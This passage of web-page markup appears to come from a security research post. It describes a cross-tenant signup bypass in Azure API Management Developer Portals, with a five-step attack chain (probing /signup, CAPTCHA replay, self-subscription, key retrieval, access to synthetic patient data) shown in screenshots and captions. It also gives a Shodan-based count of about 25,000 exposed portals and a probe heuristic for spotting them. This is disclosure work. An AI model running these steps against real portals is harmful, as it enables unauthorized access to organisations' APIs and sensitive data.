544w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-125x300.webp 125w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-426x1024.webp 426w" sizes="(max-width: 544px) 100vw, 544px"><figcaption class="widget-image-caption wp-caption-text">Attack path from anonymous attacker to data exfiltration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9af606b e-con-full e-flex e-con e-parent" data-id="9af606b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d2d10a elementor-widget elementor-widget-heading" data-id="4d2d10a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Simulated Attack Chain</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-589ceef e-con-full e-flex e-con e-parent" data-id="589ceef" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-741602a elementor-widget elementor-widget-text-editor" data-id="741602a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We demonstrated this against a controlled APIM instance under our ownership, configured with a mock healthcare IoT API behind the default Starter product. The CAPTCHA was generated cross-tenant from a separate APIM instance we control to demonstrate the cross-tenant replay.</p> <p><a id="step-1-identify-the-target."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ae38fb7 e-con-full e-flex e-con e-parent" data-id="ae38fb7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9ae8846 elementor-widget elementor-widget-heading" data-id="9ae8846" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 1: Identify the target.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79225a3 e-con-full e-flex e-con e-parent" data-id="79225a3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-65104af elementor-widget elementor-widget-text-editor" data-id="65104af" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker discovers the target’s Developer Portal hostname. These are publicly indexed; our Shodan enumeration found 25,379 unique instances.</p> <p>Target: apim-research-target-t3.developer.azure-api.net</p> <p><a id="X6b2794b1dd9fa9a2772ac2a5ffcb82f2e4e1b0f"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cacc5de e-con-full e-flex e-con e-parent" data-id="cacc5de" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ee4847b elementor-widget elementor-widget-heading" data-id="ee4847b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 2: Verify the target appears locked down, then bypass it.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-26e0b9e e-con-full e-flex e-con e-parent" data-id="26e0b9e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1c4f22c elementor-widget elementor-widget-text-editor" data-id="1c4f22c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The target organization’s portal shows no signup option, and the administrator has “disabled” signup. The only visible option is “Sign in”:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-25c2f34 e-con-full e-flex e-con e-parent" data-id="25c2f34" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-88b03ef elementor-widget elementor-widget-image" data-id="88b03ef" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="1720" height="1328" src="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp" class="attachment-full size-full wp-image-10951" alt="API portal webpage with header navigation showing Home, APIs, Products links and Sign In button, main content area displays 'page content' text" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp 1720w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-300x232.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1024x791.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-768x593.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1536x1186.webp 1536w" sizes="(max-width: 1720px) 100vw, 1720px"><figcaption class="widget-image-caption wp-caption-text">The target’s Developer Portal. The administrator has disabled signup. No “Sign up” button is visible anywhere on the page.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-2c45dd5 e-con-full e-flex e-con e-parent" data-id="2c45dd5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9500280 elementor-widget elementor-widget-text-editor" data-id="9500280" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure APIM Developer Portal with signup disabled showing only a Sign In option and no Sign Up button visible</p> <p><em>The target’s Developer Portal. The administrator has disabled signup. No “Sign up” button is visible anywhere on the page.</em></p> <p>However, a single request confirms whether the signup endpoint is still active behind the scenes:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0f2b990 e-con-full e-flex e-con e-parent" data-id="0f2b990" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b2756da elementor-widget elementor-widget-image" data-id="b2756da" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="960" height="424" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp" class="attachment-full size-full wp-image-10952" alt="Terminal showing curl POST request to signup API returning HTTP 400 error with ValidationError for challenge and signupData fields" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-300x133.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-768x339.webp 768w" sizes="(max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-deaa032 e-con-full e-flex e-con e-parent" data-id="deaa032" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ea5391 elementor-widget elementor-widget-text-editor" data-id="4ea5391" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>POST signup probe with empty JSON body returning HTTP 400 ValidationError confirming the signup endpoint is still active</p> <p><em>POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</em></p> <p>The HTTP 400 ValidationError with challenge and signupData fields confirms the /signup endpoint is live and Basic Auth is enabled. The toggle only hid the button.</p> <p><a id="step-3-create-a-cross-tenant-account."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-1ca1c56 e-con-full e-flex e-con e-parent" data-id="1ca1c56" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9a6e194 elementor-widget elementor-widget-heading" data-id="9a6e194" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 3: Create a cross-tenant account.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bc35f9d e-con-full e-flex e-con e-parent" data-id="bc35f9d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fa4a867 elementor-widget elementor-widget-text-editor" data-id="fa4a867" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker generates and solves a CAPTCHA on their own APIM instance, then replays the solution against the target:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b9bd2d3 e-con-full e-flex e-con e-parent" data-id="b9bd2d3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b3248f1 elementor-widget elementor-widget-image" data-id="b3248f1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="500" height="436" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp" class="attachment-full size-full wp-image-10953" alt="HTTP POST request to signup endpoint with JSON payload containing CAPTCHA challenge data and user registration details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp 500w, https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1-300x262.webp 300w" sizes="auto, (max-width: 500px) 100vw, 500px"><figcaption class="widget-image-caption wp-caption-text">Cross-tenant signup POST request with attacker credentials and replayed CAPTCHA</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b54db11 e-con-full e-flex e-con e-parent" data-id="b54db11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae3b262 elementor-widget elementor-widget-image" data-id="ae3b262" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="420" height="176" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp" class="attachment-full size-full wp-image-10954" alt="HTTP response showing status 200 OK, Content-Type application/json header, and response body containing the string OK" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp 420w, https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1-300x126.webp 300w" sizes="auto, (max-width: 420px) 100vw, 420px"><figcaption class="widget-image-caption wp-caption-text">HTTP 200 OK response confirming account creation</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9184338 e-con-full e-flex e-con e-parent" data-id="9184338" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c079ed7 elementor-widget elementor-widget-image" data-id="c079ed7" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1316" height="488" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp" class="attachment-full size-full wp-image-10955" alt="Email from [email protected] asking user to confirm new API account by clicking a suspicious link with long parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp 1316w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-300x111.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-1024x380.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-768x285.webp 768w" sizes="auto, (max-width: 1316px) 100vw, 1316px"><figcaption class="widget-image-caption wp-caption-text">Email invitation after successful self-sign-up</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0b8f379 e-con-full e-flex e-con e-parent" data-id="0b8f379" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-49ca69a elementor-widget elementor-widget-text-editor" data-id="49ca69a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Email invitation received after successful anonymous self-signup to the target Azure APIM Developer Portal</p> <p><em>Email invitation after successful self-sign-up</em></p> <p>The backend processes the request without validating the tenant of origin. The account is created in the target’s APIM instance. The attacker receives a confirmation email and can now log in.</p> <p><a id="Xadf1d2eff9fa4ebf9c1108a4310cd6aad77b8f3"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-189e3a5 e-con-full e-flex e-con e-parent" data-id="189e3a5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2da9547 elementor-widget elementor-widget-heading" data-id="2da9547" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 4: Authenticate, subscribe to a product, and obtain an API key.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5cdc911 e-con-full e-flex e-con e-parent" data-id="5cdc911" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8c6fd2b elementor-widget elementor-widget-text-editor" data-id="8c6fd2b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The default Starter product ships with approvalRequired: false. The attacker self-subscribes using a PUT request to the management API. No administrator approval is needed:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a3ba61d e-con-full e-flex e-con e-parent" data-id="a3ba61d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-001045d elementor-widget elementor-widget-image" data-id="001045d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp" class="attachment-full size-full wp-image-10956" alt="Terminal showing curl command making API call to Azure Management API with Basic authentication, returning HTTP 200 response with JSON ID" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-command-making-api-call-to-azure-manag-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Attacker can authenticate as a Developer to the APIM developer portal</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c7ad55d e-con-full e-flex e-con e-parent" data-id="c7ad55d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fdd9af9 elementor-widget elementor-widget-image" data-id="fdd9af9" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="324" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp" class="attachment-full size-full wp-image-10957" alt="Terminal window showing curl command creating Azure subscription with PUT request, displaying HTTP 201 response with JSON data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-creating-azure-subscrip-1-768x259.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Self-subscribe PUT request to Starter product returns 201 Created</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e719eab e-con-full e-flex e-con e-parent" data-id="e719eab" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-37ec580 elementor-widget elementor-widget-image" data-id="37ec580" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="344" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp" class="attachment-full size-full wp-image-10958" alt="Terminal window showing curl command to Azure API with HTTP 200 response containing primaryKey and secondaryKey JSON values" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-300x108.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-azure-api-with-http-1-1-768x275.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">listSecrets response containing primary and secondary API keys</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f9154a e-con-full e-flex e-con e-parent" data-id="9f9154a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7e3c937 elementor-widget elementor-widget-image" data-id="7e3c937" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1332" height="621" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp" class="attachment-full size-full wp-image-10959" alt="Email from Praetorian Research welcoming Elgin Lee to Starter subscription, showing start date 3/13/2026 and API usage details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1.webp 1332w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-300x140.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-1024x477.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-praetorian-research-welcoming-elgin-lee-to-starte-1-768x358.webp 768w" sizes="auto, (max-width: 1332px) 100vw, 1332px"><figcaption class="widget-image-caption wp-caption-text">Confirmation email of a successful subscription to Starter</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-158a6cb e-con-full e-flex e-con e-parent" data-id="158a6cb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a1c780 elementor-widget elementor-widget-heading" data-id="4a1c780" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 5: Call backend APIs.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0df09b6 e-con-full e-flex e-con e-parent" data-id="0df09b6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0186939 elementor-widget elementor-widget-text-editor" data-id="0186939" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>With a valid subscription key, the attacker makes authenticated API calls through the APIM gateway:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-eb3b039 e-con-full e-flex e-con e-parent" data-id="eb3b039" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae5d147 elementor-widget elementor-widget-image" data-id="ae5d147" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="304" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp" class="attachment-full size-full wp-image-10960" alt="Terminal window showing curl command to medical device API returning HTTP 200 response with JSON data showing total patient count of 12847" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-300x95.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-curl-command-to-medical-device-api-r-1-768x243.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient count API returns 12,847 records accessible</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-5b0bd8c e-con-full e-flex e-con e-parent" data-id="5b0bd8c" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-efe2d1c elementor-widget elementor-widget-image" data-id="efe2d1c" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="960" height="1224" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp" class="attachment-full size-full wp-image-10961" alt="Terminal window showing JSON response from medical API with patient records including names, diagnoses, and physician details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-235x300.webp 235w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-803x1024.webp 803w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-json-response-from-medical-api-with-1-1-768x979.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0881ea2 e-con-full e-flex e-con e-parent" data-id="0881ea2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-52e168d elementor-widget elementor-widget-text-editor" data-id="52e168d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Simulated patient health records returned via APIM API showing MRNs, names, dates of birth, diagnoses, and insurance IDs from synthetic test data</p> <p><em>Patient search returns full records with MRNs, names, DOBs, diagnoses, and insurance IDs. All data shown above is entirely synthetic, generated by a mock API we built for research.</em></p> <p>From anonymous internet access to patient health records and IoT device authentication tokens. Five steps, no credentials, no prior access to the target organization.</p> <p><a id="X3b0c89f01e5f0b95d7d85b6baf4140534fa4076"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-196f374 e-con-full e-flex e-con e-parent" data-id="196f374" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-28773d4 elementor-widget elementor-widget-heading" data-id="28773d4" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Impact Spectrum: From Noise to Critical Data Exposure</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a0ecf3b e-con-full e-flex e-con e-parent" data-id="a0ecf3b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bd4c3aa elementor-widget elementor-widget-text-editor" data-id="bd4c3aa" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Not every exploitable instance carries the same risk. The Azure APIM signup bypass is the common entry point, but the severity depends on what the organization has placed behind its Developer Portal. We configured three tiers of APIM instances to illustrate the range.</p> <p><a id="the-exploitability-matrix"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4e77759 e-con-full e-flex e-con e-parent" data-id="4e77759" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5ec516e elementor-widget elementor-widget-heading" data-id="5ec516e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Exploitability Matrix</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0880218 e-con-full e-flex e-con e-parent" data-id="0880218" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a550547 elementor-widget elementor-widget-text-editor" data-id="a550547" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4c7cf49 e-con-full e-flex e-con e-parent" data-id="4c7cf49" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-8cdd448 elementor-widget elementor-widget-image" data-id="8cdd448" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1768" height="1254" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp" class="attachment-full size-full wp-image-10962" alt="Flowchart showing security risk paths from cross-tenant signup through subscription decisions to final risk outcomes" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1.webp 1768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-300x213.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1024x726.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-768x545.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-security-risk-paths-from-cross-tenant-sign-1-1536x1089.webp 1536w" sizes="auto, (max-width: 1768px) 100vw, 1768px"><figcaption class="widget-image-caption wp-caption-text">Exploitability decision tree showing impact tiers based on product configuration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b7518ed e-con-full e-flex e-con e-parent" data-id="b7518ed" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-271b93e elementor-widget elementor-widget-heading" data-id="271b93e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">At Scale: 25,000+ Developer Portals Exposed</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aadbc6f e-con-full e-flex e-con e-parent" data-id="aadbc6f" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b31aeb1 elementor-widget elementor-widget-text-editor" data-id="b31aeb1" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The original advisory demonstrated the vulnerability against individual instances. We assessed the scope: how many Azure APIM Developer Portals are internet-facing, and how many are likely vulnerable?</p> <p><a id="methodology"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cee4eb4 e-con-full e-flex e-con e-parent" data-id="cee4eb4" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-5185086 elementor-widget elementor-widget-heading" data-id="5185086" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Methodology</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30f55b3 e-con-full e-flex e-con e-parent" data-id="30f55b3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9575057 elementor-widget elementor-widget-text-editor" data-id="9575057" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We queried Shodan for all hosts matching hostname:developer.azure-api.net, which returned <strong>69,248 matching banners</strong> for individual port/service observations across internet-facing APIM infrastructure. After deduplication, we identified <strong>25,379 unique APIM Developer Portal instances</strong>. We used this as our sample set for heuristic analysis.</p> <p><strong>Limitation:</strong> This search only identifies portals using the default *.developer.azure-api.net hostname. Organizations that configure custom domains (e.g., developers.contoso.com with a CNAME to Azure APIM) are not captured. Azure uses a single wildcard TLS certificate for all APIM portals, so Certificate Transparency logs do not reveal individual instance names.</p> <p><a id="X41aea7440729aec4e61385a47baf1e16fde56eb"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9ac8b5e e-con-full e-flex e-con e-parent" data-id="9ac8b5e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4a7698e elementor-widget elementor-widget-heading" data-id="4a7698e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Heuristic Analysis: Estimating Vulnerability at Scale</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f694220 e-con-full e-flex e-con e-parent" data-id="f694220" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ecae6c elementor-widget elementor-widget-text-editor" data-id="4ecae6c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We designed a non-invasive heuristic probe to classify instances without triggering any signup flow or creating any accounts on third-party infrastructure.</p> <p>Our approach: send a POST /signup request with an empty JSON body ({}), no email, password, CAPTCHA, or PII, to every instance. This request cannot create an account and does not complete any step of the signup flow. The probe classifies responses based on error message content: an HTTP 400 containing “ValidationError,” “captcha,” or “challenge” indicates the signup endpoint is active and consistent with an enabled Basic Auth provider; an HTTP 404 indicates the signup endpoint does not exist. These are heuristic-based estimates, not confirmed exploits.</p> <p>Even accounting for the margin of error, <strong>the vast majority of internet-facing APIM Developer Portals, on the order of 23,000 to 25,000 instances, show responses consistent with an active Basic Auth signup endpoint.</strong> Only 51 instances returned HTTP 404 on /signup, indicating the Basic Auth provider has been explicitly removed.</p> <p><a id="what-this-means"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-234047d e-con-full e-flex e-con e-parent" data-id="234047d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-87f8e55 elementor-widget elementor-widget-heading" data-id="87f8e55" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">What This Means</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6ba5a4e e-con-full e-flex e-con e-parent" data-id="6ba5a4e" data-element_type="container" 